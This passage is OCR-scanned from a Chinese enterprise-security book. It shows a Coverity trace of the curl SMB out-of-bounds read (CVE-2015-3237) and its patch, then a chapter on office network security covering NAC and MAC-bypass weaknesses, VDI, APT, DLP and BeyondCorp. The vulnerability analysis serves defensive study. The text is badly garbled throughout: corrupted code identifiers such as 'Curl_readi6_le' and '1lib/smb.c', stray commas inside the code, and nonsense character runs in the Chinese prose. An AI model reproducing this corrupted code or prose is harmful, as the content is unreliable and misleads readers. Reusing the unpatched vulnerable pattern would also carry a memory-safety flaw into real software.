http://curl.haxx.se/docs/adv_20150617B.html 。 下 面 是 Coverity 给 出 的 函 
数 中 漏洞 触发 流程 。 


696 *done = true; 

697 break; 

698 

699 default: 

700 smb_pop_message(conn); 

701 return CURLE_OK; /* ignore */ 

702 } 

703 

704 smb_pop_message(conn); 

705 

706 return CURLE_OK; 

707 } 

708 

709 static CURLcode smb_request_state(struct connectdata *conn, bool *done) 
710 { 

711 struct smb_request *req = conn->data->req.protop; 
712 struct smb_header *h; 

713 enum smb_req_state next_state = SMB_DONE; 
714 unsigned short len; 

715 unsigned short off; 

716 CURLcode result; 

717 void *msg = NULL; 

718 

719 /* Start the request */ 


< 1. Condition "req->state == SMB_REQUESTING", taking false branch 


721 if(req->state == SMB_REQUESTING) { 

722 result = smb_send_tree_connect(conn); 

723 if(result) { 

724 connclose(conn, "SMB: failed to send tree connect message"); 
725 return result; 

726 } 

727 

728 request_state(conn, SMB_TREE_CONNECT); 

729 } 

730 

731 /* Send the previous message and check for a response */ 


result = smb_send_and_recv(conn, &msg); 
< 2. Condition "result", taking false branch 
732 if(result && result != CURLE_AGAIN) { 
733 connclose(conn, "SMB: failed to communicate"); 
734 return result; 


735 
< 3. Condition "!msg", taking false branch 


737 if(!msg) 

738 return CURLE_OK; 
739 

740 h = msg; 


< 4. Switch case value "SMB_DOWNLOAD" 
switch(req->state) { 


742 case SMB_TREE_CONNECT: 
743 if(h->status) { 
744 req->result = CURLE_REMOTE_FILE_NOT_FOUND; 
745 if(h->status == smb_swap32(SMB_ERR_NOACCESS) ) 
746 req->result = CURLE_REMOTE_ACCESS_ DENIED; 
747 break; 
748 } 
749 req->tid = smb_swap16(h->tid); 
750 next_state = SMB_OPEN,; 
751 break; 
752 
753 case SMB_OPEN: 
754 if(h->status) { 
755 req->result = CURLE_REMOTE_FILE_NOT_FOUND; 
756 next_state = SMB_TREE_DISCONNECT; 
757 break; 
758 
759 req->fid = smb_swap16(((struct smb_nt_create_response *)msg)->fid); 
760 conn->data->req.offset = 0; 
761 if(conn->data->set.upload) { 
762 conn->data->req.size = conn->data->state.infilesize; 
763 Curl_pgrsSetUploadSize(conn->data, conn->data->req.size); 
764 next_state = SMB_UPLOAD,; 
765 
766 else { 
767 conn->data->req.size = 
768 smb_swap64(((struct smb_nt_create_response *)msg)- 
>end_of_file); 
769 Curl_pgrsSetDownloadSize(conn->data, conn->data->req.size); 
770 next_state = SMB DOWNLOAD; 
771 } 
772 break; 
773 
774 case SMB_DOWNLOAD: 
775 
< 5. Condition "h->status", taking false branch 
776 
777 if(h->status) { 
778 req->result = CURLE_RECV_ERROR; 
779 next_state = SMB_CLOSE; 
780 break; 
} 


<<< CID 1299430: Insecure data handling TAINTED_SCALAR 
<<< 6. Function "Curl_read16_le" returns tainted data. 


<< 7. Assigning: "len" = "Curl_readi6_le", which taints "len". 

781 

782 len = Curl_read16_le(((unsigned char *) msg) + 

783 sizeof(struct smb_header) + 11); 
785 off = Curl_read16_le(((unsigned char *) msg) + 


sizeof (struct smb_header) + 13); 
<< 8. Casting narrower unsigned "len" to wider signed type "int" effectively 
tests its lower bound. 
< 9. Condition "len > 0", taking true branch 
<< 10. Checking lower bounds of unsigned scalar "len" by "len > 0". 


785 

if(len > 0) { 
<<< CID 1299430: Insecure data handling TAINTED_SCALAR 
<<< 11. Passing tainted variable "len" to a tainted sink. 


786 

787 result = Curl_client_write(conn, CLIENTWRITE_BODY, 

788 (char *)msg + off + sizeof(unsigned 

int), 

789 len); 

790 if(result) { 

791 req->result = result; 

792 next_state = SMB_CLOSE; 

793 break; 

794 } 

795 } 

796 conn->data->req.bytecount += len; 

797 conn->data->req.offset += len; 

798 Curl_pgrsSetDownloadCounter(conn->data, conn->data->req.bytecount) ; 

799 next_state = (len < MAX_PAYLOAD_SIZE) ? SMB_CLOSE : SMB_DOWNLOAD; 
break; 

800 

801 case SMB_UPLOAD: 

802 if(h->status) { 

803 req->result = CURLE_UPLOAD_FAILED; 

804 next_state = SMB_CLOSE; 

805 break; 

806 } 

807 len = Curl_readi6_le(((unsigned char *) msg) + 

808 sizeof(struct smb_header) + 5); 

809 conn->data->req.bytecount += len; 

810 conn->data->req.offset += len; 

811 Curl_pgrsSetUploadCounter(conn->data, conn->data->req.bytecount) ; 

812 if(conn->data->req.bytecount >= conn->data->req.size) 


BABE EERE AMA ea, BUT AC ial 
简化 的 流程 如 下 : 


smb_request_state- 

len = Curl_read16_le(.. 
ye 

Curl_client_write(.. 


, len) 


J 


Cur 客 户 端 从 服务 端 接 到 的 数据 包 中 提取 出 len 的 值 ， 之 后 没有 经 
过 检查 便 将 len 作 为 长 度 参 数 传 入 CurL_client_write 函 数 : 


CURLcode Curl_client_write(struct connectdata *conn, 
int type, 
char *ptr, 
size_t len) 


Curl_client_write2*fpwta tt a len 1 Be AC SG AR im, BE 
len 超 过 预期 的 数据 包 长 度 。 


Curl 新 版 本 中 针对 这 个 漏洞 的 补丁 中 增加 了 对 len 的 长 度 检 查 ， 计 
算 后 的 值 不 能 超过 已 收 到 的 smb 数 据 包 的 边界 (smb->got) ° 
(http://curl.haxx.se/CVE-2015-3237.patch ) 


lib/smb.c | 12 +++++++++--- 
1 file changed, 9 insertions(+), 3 deletions(-) 
diff --git a/lib/smb.c b/1lib/smb.c 
index 8cb3503..d461a71 100644 
--- a/lib/smb.c 
+++ b/1lib/smb.c 
@@ -781,13 +781,19 @@ static CURLcode smb_request_state(struct connectdata *conn, 
bool *done) 
len = Curl_readi6_le(((unsigned char *) msg) + 
sizeof(struct smb_header) + 11); 
off = Curl_readi6_le(((unsigned char *) msg) + 
sizeof(struct smb_header) + 13); 
if(len > 0) { 
- result = Curl_client_write(conn, CLIENTWRITE_BODY, 
- (char *)msg + off + sizeof(unsigned int), 
len); 
struct smb_conn *smbc = &conn->proto.smbc; 
if(off + sizeof(unsigned int) + len > smbc->got) { 
failf(conn->data, "Invalid input packet"); 
result = CURLE_RECV_ERROR; 


else 
result = Curl_client_write(conn, CLIENTWRITE_BODY, 
(char *)msg + off + sizeof(unsigned int), 
len); 


二 十 十 十 十 十 十 十 十 


if(result) { 
req->result = result; 
next_state = SMB_CLOSE; 
break; 


} 


至 此 ， 从 这 个 漏洞 分 析 过 程 ， 我 们 可 以 了 解 到 Coverity 审 计 的 实际 
效果 。 


第 12 章 ”办公 网 络 安全 


办 公 网 络 的 安全 是 乙方 安全 公司 提供 解决 方案 最 多 的 场景 。 这 里 
之 所 以 介绍 办 公 网 络 安全 ， 主 要 因为 现在 社会 工程 学 、 定 辣 攻 击 、 
APT、 钓 鱼 、 水 坑 攻 击 ， 专 打 管 理 员 的 渗透 越 来 越 多 ， 所 以 生产 网 络 
做 到 国 知 金 淘 也 无 用 ， 攻 击 者 绕 表 后 加 跳 办 公 网 络 进攻 也 是 一 个 很 大 


的 问题 。 


男 一 方面 服务 名 网 络 大 多 是 来 目 客 户 - 服 务 端 相对 固化 的 交互 模 
型 ， 用 请 格 的 ACL 残 能 控制 绝 大 多 数 行为 ， 但 是 办 公 网 络 却 不 一 样 ， 
大 量 的 客户 端 行为 ， 人 的 鼠标 点 击 ， 运 行 各 种 程序 ， 访 问 各 种 URL 都 
无 法 预测 ， 所 以 办 公 网 络 的 解决 方案 完全 不 同 于 生产 网 络 ， 基 本 可 以 
当 作 两 件 事 情 来 对 竺 。 


12.1 文化 问题 


乙方 安全 公司 的 针对 办 公 的 解决 方案 虽 多 ， 但 在 互联 网 行业 很 多 
都 不 适用 ， 主 要 是 因为 文化 差异 。 传 统 行业 为 了 防止 PT 或 APT， 防 止 
信息 泄露 ， 防 止 内 部 舞 兹 (俗称 “内 网 ”) ， 可 以 用 比较 闻 苛 的 “控制 
型 ”管理 手段 ， 但 在 互联 网 行业 ， 互 联网 精神 的 本 质 就 是 开放 和 共 主 ， 
产品 经 理 ，UED 设 计 都 需要 大 量 的 借鉴 竞 品 ， 大 多 数 职能 都 或 多 或 少 
的 与 用 户 体验 相关 ， 需 要 频 楷 地 从 互联 网 取材 ， 程 序 员 才 不 能 google 
简直 想 离职 的 心 都 有 了 ， 如 果 用 强 封 堵 和 产 策 略 的 手段 在 技术 上 能 解 
决 问题 ， 但 在 文化 上 可 能 会 遭 到 强烈 抵制 而 无 法 落地 ， 甚 至 被 鄙 突 “一 
夜 从 香港 回 到 朝鲜 ”。 


很 多 乙方 公司 觉得 办 公 类 的 安全 产品 在 互联 网 行业 卖 不 太 动 ， 其 
实 这 个 问题 与 甲 方 是 否 目 研 无 关 ， 主 要 还 是 体验 问题 ， 能 保障 办 公 体 
ALOK, RED T DURE ° 


12.2 Fany 


图 12-1 所 示 的 安全 域 划分 方式 是 对 大 型 的 组 织 而 言 ， 中 小 型 企业 不 
需要 如 此 麻烦 。 首 先 办 公 网 络 的 服务 器 和 用 户 桌 面 环境 必须 划分 独立 
安全 域 ， 即 便 是 中 小 企业 这 个 需求 也 算是 最 基本 的 。 随 着 组 织 规模 的 
扩大 化 ， 办 公 内 服务 器 资产 超过 一 定量 级 的 情况 下 ， 服 务 器 域内 也 需 
要 单独 划 更 细 的 安全 域 : 


OA 服务 器 域 
YF 


事业 部 A 桌面 域 


事业 部 B 桌面 域 


持续 集成 
代码 托管 

部 门 A 所 属 服务 器 中 度 PC 用 户 

部 门 B 所 属 服务 器 运营 、 市 场 、 媒 体 等 


=o em 


图 12-1 ”办公 网 络 安全 域 示 意图 


涉及 内 部 经 营 信息 泄露 的 办 公 类 服务 器 ， 如 邮件 、 人 力 次 源 系 


统 、 财 务 类 系统 。 


:涉及 研发 体系 持续 集成 和 代码 托管 等 代码 资产 的 。 


:涉及 运 维 类 资产 管理 的 ， 攻 击 者 可 以 轻易 获取 所 有 服务 器 列表 其 
至 SSH 吕 D 令 的 。 


-安全 优先 级 不 算 太 高 的 测试 类 、 洒 项 资源 。 


对 于 员工 的 桌面 环境 ， 可 以 按 职能 划 安 全 子 域 ， 中 小 企业 可 以 按 
部 门 划 动态 vlan。 从 策略 维度 看 桌面 域内 部 用 户 可 以 分 为 儿 类 : 


' 运 维 、 开 发 等 技术 职能 属于 重度 PC 用 户 ， 对 网 络 、 主 机 性 能 等 要 
求 最 高 ， 如 果 对 他 们 实施 过 于 严格 的 安全 党 略 ， 一 定 会 受到 强烈 的 抵 
抗 ， 而 且 大 多 是 正常 业务 需求 ， 你 没 法 压制 这 些 需 求 。 


:在 典型 的 技术 重度 用 户 中 ， 研 发 属于 比较 特殊 的 一 类 ， 既 需要 灵 
活 ， 义 需要 防止 源 代码 泄露 ， 需 要 单独 画 一 个 圈 ， 把 他 们 放 进 去 。 


:市场 运 营 这 些 属 于 中 度 PC 用 户 ，PC 是 他 们 的 办 公 工 具 ， 以 文档 、 
网 页 、 视 频 、 体 验 竞 品 之 类 的 为 主 ， 对 用 户 体验 有 一 定 的 要 求 ， 但 不 
会 像 运 维 开发 那样 对 系统 限制 百般 挑 罗 ， 能 够 适应 一 定 的 限制 性 安全 
策略 而 不 会 产生 很 大 的 阻力 。 


客服 、 线 下 推广 等 职能 ， 属 于 轻 度 PC 用 户 ， 尽 管 网 游 类 的 客服 可 
能 整 天 挂机 泡 在 游戏 中 ， 但 在 安全 的 视角 上 仍 归 属于 轻 度 用 户 ， 他 们 
的 办 公 和 需求 比 较 单一 ， 大 多 数 只 需要 用 一 些 邮 件 和 类 似 CRM 的 系统 ， 


不 需要 太 多 主观 上 的 安装 新 软件 和 对 系统 变更 之 类 的 交互 ， 甚 至 对 性 
能 要 求 不 高 ， 在 管理 上 可 以 实施 较 严 格 的 安全 策略 。 


办 公 内 的 安全 域 一 方面 是 为 了 隅 离 威胁 ， 另 一 方面 是 为 了 把 安全 
域 作 为 实施 安全 策略 的 最 小 分 组 单元 ， 以 便于 对 不 同 的 单元 附加 不 同 
的 策略 。 


12.3 ”终端 管理 


征 办 公安 全 中 最 大 的 一 环 ， 市 场 上 有 很 多 解决 方案 中 ， 
安全 公司 集中 了 大 量 的 优势 兵力 在 这 个 方面 ， 推 出 了 不 少 商业 产品 ， 
企业 而 言 ， 在 这 个 方面 不 会 跟 生 产 网 络 一 样 涉及 “ 目 
研 ” 这 个 话题 ， 基 本 上 都 是 围绕 商业 产品 展开 ， 当 然 也 有 极 少数 例外 。 


1.4) T E 


补丁 管理 可 能 是 当下 被 认为 没 太 多 撤 术 人 台 量 ， 但 很 基础 的 一 环 ， 
大 多 数 办 公 桌 面 都 是 以 微软 的 Windows 操 作 系 统 为 主 ， 所 以 补丁 管理 多 
数 依 徘 几 个 方面 : 


-微软 自身 解决 方案 中 的 SCCM (WSUS/SMS 替 代 品 ， 支 持 Linux 和 


OSX) ， 如 图 12-2 所 示 。 
.利用 第 三 方 终端 管理 软件 中 附带 的 补丁 推送 功能 。 


2. 组 策略 (GPO) 


组 策略 的 作用 主要 在 于 实施 一 些 “ 基 本 的 ”安全 策略 。 例 如 人 允许 客 
尸 端 运行 软件 的 黑 日 名 单 、 系 统 配 置 选项 ，USB 权 限 管 理 等 。 


管理 端 ， 由 SCCM 服务 器 
和 活动 目录 服务 器 组 成 


被 管理 端 


PC Tablet PC 终端 设备 手机 笔记 本 服务 器 


图 12-2 SCCM 架构 


在 禁用 软件 时 也 有 一 些 技 巧 ， 比 如 禁用 QQ， 可 以 禁用 它 运行 所 需 
要 的 DLL， 这 样 有 些 黑 客 的 小 伎俩 束 不 管用 了 。 


图 12-3 包 含 了 一 些 典 型 的 组 策略 。 


Lf Desktop Policy Manager: IE Maintenance Home Page -| 

避 Desktop Policy Manager: mapping test - (B9127653-DCE 
3 Desktop Policy Manager: Marketing User Lockdown - {C 
p? 2 


15) Desktop Policy Manager: Test - (E1A781C0-2E76-4F4D-E 
5] Desktop Policy Manager: users test - (302C1858-049F-4E 
I Domain User Logon Script 


图 12-3 ”组 策略 界面 
3. 终 端 HIPS (AV) 


目前 360 自 产 PC 端 安全 卫士 、360 杀 毒 ， 腾 讯 自 产 PC 管 家 ， 百 度 自 
产 百度 杀毒 产品 ， 除 此 之 外 ， 其 他 厂商 基本 在 这 个 问题 上 都 不 具备 太 
多 选择 能 力 。 卡 巴 、 诺 顿 、 趋 势 这 些 都 是 现成 的 产品 ， 基 本 也 不 害 
制 ， 再 深究 其 技术 也 意义 不 大 ， 因 为 只 是 跟 提 供 该 产品 的 乙方 安全 厂 


商 有 关 ， 跟 甲 方 实则 无 太 大 关系 。 甲 方 唯一 要 做 的 束 是 选 型 ， 然 后 


4. 网 络 准 入 NAC 


目前 主流 的 网 络 准 入 主要 有 两 种 方式 802.1x， 基 于 终端 管理 软件 
的 C/S 模 式 认证 。 在 实施 NAC 方 案 之 前 ， 需 要 在 安全 域 划 分 时 划 出 guest 
vlan， 没 有 通过 认证 的 客户 端 一 律 丢 到 guest vlan 去 。 


网 络 准 入 认证 示意 图 如 图 12-4 所 示 。 


图 12-4 ”网 络 准 入 认证 示意 图 


这 种 方案 是 最 常见 的 网 络 准 入 ， 前 提 是 所 有 的 交换 机 都 支持 
802.1X。 但 并 非 所 有 的 客户 端 设 备 都 支持 802.1x， 例 如 打印 机 ， 所 以 
802.1x 有 一 个 扩展 叫 MAB (Mac Address Bypass) ， 如 果 客 户 端 无 法 提 
供 user/password 的 认证 方式 则 以 设备 自身 的 MAC 地 址 作为 认证 ， 这 对 
于 有 心 的 攻击 者 而 言 就 是 很 好 的 绕 过 点 ， 即 使 那些 机 器 都 锁 屏 ， 获 取 
那些 已 通过 认证 的 设备 的 MAC 地 址 也 并 非 难事 。 


C/S 模 式 认证 如 下 : 


-基于 终端 管理 软件 实现 的 NAC 跟 802.1x 也 类 似 ， 没 有 通过 认证 的 
客户 端 被 服务 端 以 tcpkill 等 方式 “ 踊 下 线 ”。 


.复合 认证 的 意义 在 于 ， 当 802.1x 被 突破 时 ， 还 有 一 层 认 证 做 后 
备 。 


124 安全 网 关 


办 公 网 络 的 网 关 类 设备 五 花 八 门 ， 但 总 体 上 觉得 不 如 生产 网 络 的 
网 关 设 备 作 用 那么 大 。 


1.NGFW/FW 


下 一 代 防 火 墙 如 果 是 类 似 UTM 的 大 杂烩 ， 对 中 小 企业 可 能 有 用 ， 
但 在 APT 兴 起 的 年 代 ， 对 办 公 网 络 内 的 比较 隐秘 的 攻击 可 能 都 没 大 
用 ， 如 果 用 NGFW 的 设计 与 实现 上 采用 了 联合 威胁 情报 的 大 数据 做 判 
断 的 方法 ， 例 如 IP 地 址 URL 灰 名 单 库 ， 相 对 来 说 会 有 更 积极 的 意义 。 


2.UTM/ 反 病毒 网 关 /NIPS/ 反 垃圾 邮件 


基于 应 用 层 协议 扫描 和 查 杀 ， 网 天 设备 为 7 层 协 议 提供 实时 扫描 和 
防护 的 功能 因为 涉及 性 能 问题 在 生产 网 络 的 应 用 面 都 比较 窄 ， 但 在 办 
公 网 络 还 古 有 比较 大 的 销售 价值 。 如 采 要 深究 具体 效果 如 何 ， 默 认 配 
置 可 能 不 会 效果 太 强 ， 仍 需 目 己 动手 加 策略 。 


Tv 


3.4824 


堡垒 机 虽然 部 署 在 办 公 网 络 的 网 关 处 ， 但 主要 为 生产 网 络 的 远程 
接 入 提供 行为 审计 。 


Ast HIT 


行为 审计 主要 是 对 员工 上 网 行为 做 审计 ， 有 些 设 备 对 明文 协议 其 
至 古 可 破解 的 加 密 协 议 提供 了 截取 和 存储 的 功能 ， 一 方面 给 公安 部 门 
要 求 的 反动 政治 言论 提供 治理 的 证 据 ， 兄 一 方面 也 给 喜欢 监控 员工 行 
为 、 欣 制 欲 极 强 的 老板 们 提供 了 便利 的 渠道 。 当 然 对 于 抓 内 鬼 ， 商 业 
间谍 等 也 有 一 些 作 用 。 


5HE 


其 他 的 产品 〈 例 如 DLP、 抗 APT、 大 数据 探 针 ) 可 能 都 会 涉及 网 
天 设备 ， 但 是 对 一 个 企业 而 言 ， 一 个 出 口 要 堆 县 N 层 设备 BRF 
路 ) 显然 是 不 合理 ， 有 具体 取舍 就 看 使 用 的 场景 和 对 安全 的 理解 了 


125 人 研发 管理 
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标 配 职能 。 对 研发 的 管理 是 挑战 比较 大 的 工作 ， 因 为 它 既 需 要 保证 便 
利和 用 户 体验 ， 又 有 比较 强 的 安全 和 需求， 两 者 一 定 程度 上 是 矛盾 的 ， 
综合 来 说 目前 业内 还 没有 完美 解决 方案 。 下 面 介绍 两 种 目前 常用 的 方 
法 。 


研发 体系 往往 涉及 知识 产权 和 机 密 数 据 ， 尽 管 不 是 所 有 的 源 代码 
泄露 都 会 造成 经 营 危 机 ， 比 如 就 算 给 你 QQ 的 源 代码 你 也 无 法 建立 腾讯 
mel, Aaah EMRE TERRAIN REAR, AN 
Fe SEBS BOOK BE 22 [a eal ° (ELT) it Exh EIA RENE 
畴 。 当 然 也 有 一 些 业 务 ， 比 如 大 型 网 洲 ， 如 采 源 代码 和 游戏 内 的 数值 
设 定 都 泄露 了 ， 换 皮 复 制 一 款 游戏 的 门槛 并 不 高 ， 很 快 就 会 侵害 原 产 
品 的 利益 。 同 时 ， 源 代码 泄露 还 会 加 速 外 挂 的 泛 洪 ， 以 及 bug 的 流行 ， 
对 产品 本 身 来 说 确实 影响 比较 大 。 


从 安全 的 角度 讲 所 有 类 型 产品 的 源 代码 泄露 都 会 加 速 漏洞 控 掘 的 
whe, ME) 商 在 公开 场合 表示 如 何以 开放 的 心态 面 对 漏 洞 披露 ， 实 


际 上 所 有 漏洞 对 目 身 的 利益 都 会 有 所 损害 ， 所 以 这 些 多 少 部 会 成 为 公 
司 防 泄 密 的 原始 驱动 力 所 在 。 


一 般 情 况 下 会 给 研发 配 两 台 PC， 一 台 能 畅游 互联 网 随心 所 欲 ， 另 

一 台 则 用 于 coding 不 能 访问 互联 网 ， 个 别 需要 复制 粘贴 的 资源 通过 服务 

器 的 共享 文件 夹 来 中 转 ， 或 者 使 用 其 他 方式 实现 双 机 前 切 板 共享 。 

台 PC 属 于 不 同 的 vlan， 之 间 不 能 互 访 ， 但 都 可 以 访问 中 转 服 务 右 。 图 
12-5 是 一 个 商 单 的 示例 。 
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图 12-5 ”研发 环境 访问 控制 示意 图 


在 物理 安全 上 ， 硅 胶 封 USB 实 际 上 不 是 太 管用 ， 那 玩意 儿 容 易 
掉 ， 最 好 的 方法 还 是 机 箱 上 锁 ， 组 策略 中 禁用 USB 的 数据 传输 功能 ， 
保留 鼠标 、 画 图 板 和 充电 的 功能 。 


2. 源 代码 管理 


原则 上 源 代 码 管理 一 定 征 在 公司 层面 有 统一 的 持续 集成 和 代码 托 
管 平台 ， 最 新 的 源 代码 至 少 在 公司 的 平台 上 有 一 份 完整 的 拷贝 ， 同 时 
由 IT 部 门 做 好 复制 和 灾 备 的 工作 。 


具体 在 权限 上 应 该 如 何 划分 ， 实 际 上 是 一 个 文化 的 问题 ， 而 不 旦 
一 个 技术 问题 。 权 限 划分 得 越 死 ， 束 会 阻碍 学 习 和 知识 共享 。 有 些 人 
可 以 很 目 罕 地 说 他 们 可 以 几乎 不 受 限 制 地 查看 源 代码 ， 交 叉 甚 至 跨 首 
门 做 code review， 对 方 同意 后 还 能 对 别人 的 代码 提交 修改 ， 在 工程 师 文 
化 比较 深重 的 地 方 ， 权 限 划 分 也 相对 目 由 。 有 些 人 说 目 己 公司 俩 发 的 
言 恩 安全 管理 做 得 如 何 好 ， 如 采 没 有 解决 用 户 体验 问题 其 实 都 不 值得 
称道 。 换 个 等 价 的 说 法 就 是 权限 只 是 研发 文化 的 一 种 写照 而 已 。 


如 琳 有 人 觉得 上 述 比 较 理 想 化 ， 那 么 实际 一 后 正 是 把 各 产品 和 项 
目 分 开 来 ， 把 权限 划分 交 给 项 目的 技术 Leader， 由 他 目 己 去 决定 组 员 的 
具体 权限 ， 如 有 果 他 所 在 的 项 目 组 很 多 都 是 新 员工 ， 心 理 没 太 多 底 ， 那 
束 人 守 一 点 ， 如 来 团队 成 员 经 芝 要 半夜 被 叫 起 床 应 急 修 改 代码 ， 那 整 


宽松 一 点 。 


遇 到 有 的 人 喜欢 擅 目 把 源 代 码 同步 到 GitHub 这 种 地 方 去 的 ， 最 但 
征 把 密 钥 也 同步 出 去 ， 安 全 部 门 惑 要 考虑 写 个 朴 虫 去 GitHub 抓 一 下 关 
键 字 。 


12.6 ”远程 访问 


远程 访问 (例如 VPN 等 ) 最 大 的 问题 是 暴力 破解 ， 对 于 较 大 企业 
而 言 ， 一 般 都 会 选择 双 因素 认证 ， 很 多 人 都 接触 过 就 是 给 你 发 了 一 块 
RSA 令 牌 ( 见 图 12-6) ， 更 加 谨慎 一 点 的 ， 在 外 网 收 邮件 也 用 双 因素 
认证 。 


图 12-6 ”RSA 令 牌 


对 于 雇员 不 多 的 中 小 企业 ， 如 采 没 有 太 多 远程 访问 的 需求 ， 管 理 
员 目 己 觉 得 可 控 性 比较 强 ， 以 省 钱 为 初衷 可 以 选择 只 使 用 传统 的 口令 
验证 的 方式 ， 前 提 是 口令 长 度 足够 ， 复 杂 度 也 足够 ， 或 者 开局 账号 锁 
定 策略 ， 并 定期 审计 登录 日 志 中 的 异常 行为 。 


12.7 Rete 
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桌面 虚拟 化 产品 跟 以 前 的 NC (Network Computer) 很 像 ， 它 在 安 
全 方面 的 先天 性 优势 是 数据 在 服务 器 上 ， 终 端 用 户 只 有 一 个 通过 
RDP/CA 等 协议 得 到 一 个 远程 桌面 一 样 的 界面 ， 本 地 只 有 岂 标 链 盘 ， 
没有 可 以 找 贝 数据 的 USB 口 ， 在 物理 安全 上 比 传统 PC 高 出 不 少 ， 唯 一 
的 入 口 就 是 用 户 通过 虚拟 机 (实际 上 虚拟 机 实例 在 服务 器 上 ) 和 
Internet 的 连接 把 数据 传 出 去 ， 因 为 虚拟 化 桌面 的 实际 计算 资源 都 在 IDC 
机 房 的 服务 器 集群 上 ， 所 以 在 安全 管理 上 有 两 大 便利 : 


Citrix XenDesktop 7 
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图 12-7 “Citrix 的 技术 架构 


:通过 严格 的 统一 安全 策略 可 以 使 终端 用 户 “ 能 做 的 事情 ?和 攻击 面 
大 幅 减 小 。 

' 原 来 要 在 每 台 服 务 器 上 安装 杀毒 软件 ， 现 在 不 用 那么 麻烦 了 ， 所 
有 的 入 侵 检测 针对 “服务 侨 ” 做 吏 可 以 。 


审计 比 原 来 更 容易 做 ， 因 为 “都 集中 在 一 起 了 嘛 ”， 也 能 做 到 像 堡 
又 主机 一 样 全 程 孙 屏 ， 如 图 12-8 所 示 。 
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图 12-8 Je BAe a HARB 


如 有 果 以 防 泄漏 为 业务 目标 ， 基 于 虚拟 化 桌面 的 安全 方案 是 比较 有 
效 的 ， 对 安全 和 IT 管理 者 来 说 也 比较 省 事 。 但 是 缺点 也 很 明显 ， 虚 拟 
化 桌面 并 不 能 完全 代替 PC， 你 让 运 维和 研发， 或 者 天 天 挂 在 游戏 产品 
里 的 PM 去 用 这 玩意 儿 ， 售 计 要 造反 了 。 


那 在 互联 网 公司 是 不 征 有 适合 的 使 用 场景 呢 ? 有 。 比 如 之 前 拓 人 到 
的 轻 度 PC 用 户 ， 这 类 用 户主 要 以 网 页 浏览 、 文 字 编 辑 、 收 发 邮件 、 语 
音 和 IM 通 讯 为 主 ， 对 这 类 需求 而 言 ， 虚 拟 化 果 面 足够 了 ， 因 此 这 个 方 
案 可 以 在 较 大 的 公司 里 用 于 这 一 部 分 典型 用 户 ， 而 不 必 追 求 整 个 公司 
都 是 大 一 统 的 方案 。 


以 前 很 多 人 有 技术 清音 ， 公 司 的 安全 方案 人 必须“ 一刀切 ”,，“ 大 一 
统 ”， 其 实 只 要 公司 大 过 一 定 的 规模 ， 真 没 必 要 。 


12.8 APT 


APT 这 个 词 在 安全 行业 很 流行 ， 但 是 对 甲 方 来 说 意义 并 不 是 那么 
大 ， 因 为 绝 大 多 数 企 业 部 不 太 可 能 去 开发 抗 APT 产 品 。 如 琳 你 所 在 的 
公司 尚 无 能 力 构 建 一 支 在 业内 平均 水 平 以 上 的 攻防 型 团队 ， 那 么 抗 
APT 这 件 事 基本 可 以 忽略 。 你 唯一 的 选择 十 购买 APT 检 测 产 品 ， 但 是 这 
类 产品 的 结果 往往 不 太 “ 人 机 友好 ”， 没 个 安全 专家 压根 儿 判 断 不 了 。 
抗 APT 本 质 上 是 有 实力 的 安全 公司 和 极 少数 实力 与 安全 公司 对 等 的 甲 
方 安全 团队 玩 的 东西 。 


没有 实力 构建 强 有 力 的 安全 团队 ， 一 方面 代表 钱包 不 足 ， 一 般 也 
不 会 吸引 a 到 APT; 另 一 方面 假如 真有 问题 ， 各 种 技术 手段 往往 还 不 如 
熟人 通过 黑 产 和 道上 朋友 告知 被 入 侵 的 “威胁 情报 ”更 现实 一 点 。 


那 是 不 十 束 两 手 一 摊 ， 完 全 放弃 ， 无 事 可 做 ， 无 狗 可 救 ? 也 不 尽 
然 。 可 以 分 成 几 个 维度 来 考虑 : 


如果 基本 的 安全 体系 尚 不 完备 ， 处 于 救火 阶段 或 者 安全 体系 化 建 
设 捉襟见肘 ，APT 可 以 和 多 放 一 边 不 管 。 如 采 目 身 缺 乏 攻 防 研究 能 力 ， 
但 是 有 钱 有 预算 ， 可 以 选择 APT 产 品 和 专家 外 包 服 务 ， 乙 方 是 否 尽心 
尽力 这 个 无 从 评价 ， 只 能 说 理论 上 有 这 个 渠道 。 


如果 和 是 有 攻防 型 的 安全 团队 ， 有 一 点 余力 ， 可 以 从 完善 既 有 入 侵 
检测 体系 入 手 ， 例 如 陷阱 网 络 和 蜜 负 (honeypot) 征 一 种 门 想 和 成 本 不 
高 的 手段 ， 对 入 侵 者 有 一 定 的 诱导 和 发 现 能 力 。 


用 蜜 饶 是 在 办 公 网 络 中 一 种 不 错 的 入 侵 检测 手段 ， 其 大 致 概念 如 
图 12-9 所 示 。 但 是 在 大 型 生产 网 络 里 不 适合 作为 主要 手段 ， 而 应 该 是 一 
种 补充 手段 的 方案 。 
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图 12-9 ZREN 


对 于 有 一 定安 全 实力 的 安全 团队 ， 应 该 奶 求 的 是 寻找 和 建立 “大 数 
据 ”， 参 与 业界 合作 。 随 着 时 间 的 推移 ，APT 的 解决 方案 会 从 高 冷 逐 渐 
走 癌 平实 ， 抗 APT 的 厂商 和 解决 方案 会 越 来 越 多 ， 到 时 候选 择 会 更 
多 ， 所 以 上 述 观 点 仅 代表 在 当前 时 间 操 的 结论 ， 不 能 代表 技术 和 市 场 
发 展 之 后 的 状态 。 


12.9 DLP 数据 防 泄密 


DLP (Data Loss Prevention) 的 主流 方案 目前 在 互联 网 行业 落地 可 
能 都 存在 有 不 小 的 问题 ， 在 兼容 用 户 体验 、 性 能 方面 仍 有 很 大 的 改进 
空间 。 但 在 传统 行业 可 以 作为 比较 主要 的 方案 。 图 12-10 为 Symantec 的 
DLP 部 署 架 构 ， 主 要 通过 终端 (Agent) 控制 ， 网 络 出 口 控制 ， 以 及 检 
测 网 络 流量 实现 。 其 他 的 厂商 还 包括 Websence 等 ， 具 体 可 以 参考 
Gartner 魔 力 象 限 。 
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图 12-10 Symantec DLP 架 构 


12.10 ”移动 办 公 和 边界 模糊 化 


2015 年 年 中 ，Google 发 布 了 beyondCorp 项 目 (如 图 12-11 所 示 ) ， 
宣称 其 办 公 网 络 将 取消 内 网 ， 这 意味 着 上 面 所 提 及 的 办 公 网 络 的 解决 
方案 有 一 大 半 都 作废 了 。 其 基本 假设 是 ， 内 部 网 络 实际 上 跟 互 联网 一 
样 危险 。 因 为 一 旦 内 网 边界 被 突破 ， 攻 击 者 就 很 容易 访问 到 企业 内 部 
应 用 ;另外 现在 的 企业 越 来 越 多 采用 移动 和 云 技 术 ， 边 界 保护 变 得 越 
来 越 难 。 所 以 干脆 一 视 同 仁 ， 不 外 区 分 内 外 网 ， 用 一 致 的 手段 去 对 
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AJ12-11 Google 的 beyondcorp 项 目 


